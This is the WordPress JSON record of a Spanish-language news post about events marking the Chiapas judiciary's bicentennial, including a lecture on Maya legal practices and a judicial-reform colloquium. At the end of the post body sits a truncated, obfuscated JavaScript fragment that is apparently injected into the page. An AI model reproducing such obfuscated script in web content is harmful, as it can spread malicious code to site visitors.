{"id":21664,"date":"2025-04-30T03:35:51","date_gmt":"2025-04-30T03:35:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21664"},"modified":"2025-04-30T03:35:52","modified_gmt":"2025-04-30T03:35:52","slug":"continua-el-ciclo-juridico-y-cultural-en-conmemoracion-de-los-200-anos-del-poder-judicial-del-estado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21664","title":{"rendered":"Contin\u00faa el Ciclo Jur\u00eddico y Cultural, en conmemoraci\u00f3n de los 200 a\u00f1os del Poder Judicial del Estado"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"21666\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0022-1024x681.jpg\" alt=\"\" class=\"wp-image-21666\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0022-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0022-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0022-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0022-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0022-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0022-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"21665\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0019-1024x681.jpg\" alt=\"\" class=\"wp-image-21665\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0019-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0019-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0019-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0019-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0019-2048x1363.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0019-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"725\" data-id=\"21667\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0021-1024x725.jpg\" alt=\"\" class=\"wp-image-21667\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0021-1024x725.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0021-300x212.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0021-768x544.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0021-1536x1088.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250429-WA0021.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u201cEste ciclo representa no s\u00f3lo un homenaje al legado de justicia que nos precede, sino tambi\u00e9n una oportunidad para fortalecer los lazos entre la academia, la cultura y la sociedad\u201d, Juan Carlos Moreno Guill\u00e9n.<\/li>\n<\/ul>\n\n\n\n<p>29 de abril del 2025. En el segundo d\u00eda del Ciclo Jur\u00eddico y Cultural, las instalaciones de esta casa de la justicia se llenaron de expresiones art\u00edsticas, de m\u00fasica y de conocimiento, con las actividades que se programaron para la conmemoraci\u00f3n del Bicentenario de este Poder Judicial.<\/p>\n\n\n\n<p>Iniciando el d\u00eda con la presentaci\u00f3n de la Banda de M\u00fasica de Coneculta, en la cual el magistrado presidente Juan Carlos Moreno Guill\u00e9n, junto a las y los asistentes, se deleitaron con las interpretaciones de melod\u00edas que llenaron de alegr\u00eda y emocionaron a todas y todos quienes estuvieron en el renovado Vest\u00edbulo de la Jurisprudencia, del palacio de justicia en Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Posteriormente, la doctora en historia Virginia Margarita L\u00f3pez Tovilla disert\u00f3 la conferencia magistral denominada \u201cPr\u00e1cticas jur\u00eddicas prehisp\u00e1nicas mayas y su transformaci\u00f3n en los primeros a\u00f1os de la Colonia\u201d, en la cual tambi\u00e9n estuvo presente la directora de la Facultad de Humanidades de la Unicach, Mar\u00eda Eugenia Balderas Correa.<\/p>\n\n\n\n<p>En esta conferencia, el magistrado presidente Moreno Guill\u00e9n subray\u00f3 la importancia de contar con los antecedentes primarios de la justicia en Chiapas, desde los mayas hasta despu\u00e9s de la Colonia, para poder tener el contexto jur\u00eddico de la evoluci\u00f3n que ha tenido la justicia en la sociedad.<\/p>\n\n\n\n<p>\u201cEste ciclo representa no s\u00f3lo un homenaje al legado de justicia que nos precede, sino tambi\u00e9n una oportunidad para fortalecer los lazos entre la academia, la cultura y la sociedad. Por ello, estamos muy agradecidos con la participaci\u00f3n de todas y todos quienes hacen posible este encuentro, convencidas y convencidos de que el di\u00e1logo y el conocimiento son pilares fundamentales para construir una justicia m\u00e1s humanista\u201d, expres\u00f3 Juan Carlos Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>Por su parte, la doctora Virginia Margarita L\u00f3pez Tovilla agradeci\u00f3 la invitaci\u00f3n a formar parte de este d\u00eda tan especial para el Poder Judicial, en el que se cumplen 200 a\u00f1os de su creaci\u00f3n y de su compromiso por la justicia en Chiapas; asimismo, expuso un an\u00e1lisis sobre las formas de organizaci\u00f3n jur\u00eddica de los pueblos mayas, resaltando la importancia de sus instituciones y procedimientos para la resoluci\u00f3n de conflictos, as\u00ed como la manera en que estas pr\u00e1cticas se transformaron a lo largo del tiempo.<\/p>\n\n\n\n<p>Finalmente, desde el auditorio Manuel Jos\u00e9 de Rojas, de la Facultad de Derecho de la Universidad Aut\u00f3noma de Chiapas (Unach), en San Crist\u00f3bal de Las Casas, fue sede del coloquio &#8220;La Reforma al Poder Judicial en Chiapas: Los retos de la justicia local a dos siglos de su instalaci\u00f3n&#8221;, perteneciente al Ciclo Jur\u00eddico y Cultural, en conmemoraci\u00f3n de los 200 a\u00f1os del Poder Judicial del Estado.<\/p>\n\n\n\n<p>En esta actividad, el magistrado presidente Juan Carlos Moreno Guill\u00e9n, acompa\u00f1ado por el expresidente de la Comisi\u00f3n Nacional de los Derechos Humanos (CNDH), Ra\u00fal Plascencia Villanueva, destac\u00f3 que este coloquio se realiz\u00f3 con el firme compromiso de fortalecer y consolidar el Estado de Derecho en nuestra entidad, en cumplimiento del mandato constitucional derivado del Pacto Federal, mediante el cual Chiapas ha asumido el reto hist\u00f3rico de democratizar aut\u00e9nticamente su Poder Judicial.<\/p>\n\n\n\n<p>\u201cDesde este espacio, realizo un reconocimiento a las y los jueces chiapanecos, que quienes estamos inmersos en el Poder Judicial sabemos que entregan su d\u00eda a d\u00eda, incluso sus fines de semana, a su quehacer judicial, porque saben la responsabilidad y el honor que conlleva impartir justicia al pueblo chiapaneco\u201d, expres\u00f3 Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>Este coloquio estuvo integrado por la secretaria general de Acuerdos del Pleno de Distrito del Tribunal Superior de Justicia, Norma Isela Carballo Blanco, quien fungi\u00f3 como moderadora; as\u00ed como por la docente e investigadora del Instituto de Investigaciones Jur\u00eddicas de la Unach, Adriana Yolanda Flores Castillo, y los investigadores del Instituto de Investigaciones Jur\u00eddicas de la UNAM, Daniel Barcel\u00f3 Rojas y C\u00e9sar Iv\u00e1n Astudillo Reyes, quienes disertaron y compartieron reflexiones, investigaciones y propuestas en torno a la tem\u00e1tica central.<\/p>\n\n\n\n<p>Asistieron a este evento las consejeras y consejero de la Judicatura, magistradas, magistrados, juezas, jueces, docentes, estudiantes y profesionales del derecho en San Crist\u00f3bal de Las Casas, as\u00ed como personal administrativo y jurisdiccional de esta casa de la justicia.<\/p>\n\n\n\n<p>Todas estas actividades est\u00e1n programadas y dise\u00f1adas para seguir honrando la historia y el legado de las mujeres y hombres que han contribuido para que, en Chiapas, hoy contemos con una justicia m\u00e1s humanista, incluyente y accesible, que fortalezca la cultura de paz.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. \u201cEste ciclo representa no s\u00f3lo un homenaje al legado de justicia que nos precede, sino tambi\u00e9n una oportunidad para fortalecer los lazos entre la academia, la cultura y la sociedad\u201d, Juan Carlos Moreno Guill\u00e9n. 29 de abril del 2025. En el segundo d\u00eda del Ciclo Jur\u00eddico y Cultural, las instalaciones de esta casa de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21666,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21664","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21664","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21664"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21664\/revisions"}],"predecessor-version":[{"id":21668,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21664\/revisions\/21668"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21666"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21664"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21664"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21664"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}